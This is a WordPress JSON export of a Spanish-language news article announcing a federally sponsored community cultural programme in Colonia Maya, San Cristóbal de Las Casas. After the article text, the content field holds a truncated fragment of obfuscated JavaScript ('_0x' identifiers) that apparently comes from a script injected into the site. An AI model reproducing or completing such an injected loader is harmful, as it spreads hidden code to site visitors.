{"id":1739,"date":"2022-04-29T02:29:22","date_gmt":"2022-04-29T02:29:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1739"},"modified":"2022-04-29T02:29:23","modified_gmt":"2022-04-29T02:29:23","slug":"se-realizara-en-sc-segundo-convite-cultural","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1739","title":{"rendered":"Se realizar\u00e1 en SC segundo Convite Cultural"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-28-at-3.20.45-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-1740\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-28-at-3.20.45-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-28-at-3.20.45-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-28-at-3.20.45-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-28-at-3.20.45-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- El Segundo Convite Cultural, que organiza la Secretar\u00eda de Cultura Federal, a trav\u00e9s del programa Cultura Comunitaria, comenzar\u00e1 el pr\u00f3ximo s\u00e1bado 30 en esta ciudad, con la finalidad de llevar actividades culturales y art\u00edsticas a la comunidad, en esta ocasi\u00f3n se realizar\u00e1 en la Colonia Maya, informaron sus coordinadores Marco Gir\u00f3n, Tania Navarro y Julio Sol\u00eds. Marco Gir\u00f3n coment\u00f3 que esto tendr\u00e1 lugar de 5 a 7 de la tarde, \u201cel a\u00f1o pasado se hizo en el Barrio de Tlaxcala, pensamos que tambi\u00e9n es un acierto llevar este programa a otros lugares. Cada localidad tiene su propio proceso as\u00ed como en los sondeos que realizamos previamente a aplicar el Convite Cultural en las localidades, vamos viendo las necesidades de las localidades\u201d. \u201cPor ejemplo en la Colonia Maya tienen la inquietud de aprender m\u00e1s acerca de lo audiovisual y tambi\u00e9n por el tema que ellos tratan como es la defensa del territorio, el agua y los humedales, invitamos a un agente cultural que es experto en el tema que podr\u00eda aportar mucho para que tambi\u00e9n sigan construyendo esta experiencia en torno a este tema y yo creo pueden salir varios temas porque el eje transversal de los Convites Culturales atienden los derechos, la equidad de g\u00e9nero, la interculturalidad son varios temas que se tocan dentro del proceso\u201d, puntualiz\u00f3. Por su parte,  Tania Navarro Aceituno indic\u00f3 que el objetivo es ofertar a la ciudadan\u00eda una serie de actividades culturales y art\u00edsticas bajo lenguaje creativo como el audio visual y el interdisciplinario. \u201cParticipan unos 5 colectivos, entre instituciones de gobierno del medio cultural y colectivos independientes. Hay otro equipo dentro de esta iniciativa que es el equipo dos situados en el municipio de Tapalapa en la zona Zoque y el municipio de Ray\u00f3n\u201d. En tanto, Julio Sol\u00eds se\u00f1al\u00f3 que consideran que la Colonia Maya es muy importante para San Crist\u00f3bal, muy organizada y tiene el inter\u00e9s de contar con este tipo de eventos, ya que se sigue trabajando con municipios prioritarios que tienen \u00edndices de violencia, marginaci\u00f3n, pobreza, \u201cy en el caso de Tuxtla y San Crist\u00f3bal es por sus \u00edndices de violencia\u201d. \u201cEn San Crist\u00f3bal iniciamos el d\u00eda s\u00e1bado, en Tuxtla el viernes, trabajando durante 25 semanas, el horario es de 5 a 7, todas las actividades que son gratuitas y para todas las edades\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- El Segundo Convite Cultural, que organiza la Secretar\u00eda de Cultura Federal, a trav\u00e9s del programa Cultura Comunitaria, comenzar\u00e1 el pr\u00f3ximo s\u00e1bado 30 en esta ciudad, con la finalidad de llevar actividades culturales y art\u00edsticas a la comunidad, en esta ocasi\u00f3n se realizar\u00e1 en la Colonia Maya, informaron sus &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1740,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1739","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1739","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1739"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1739\/revisions"}],"predecessor-version":[{"id":1741,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1739\/revisions\/1741"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1740"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1739"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1739"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1739"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}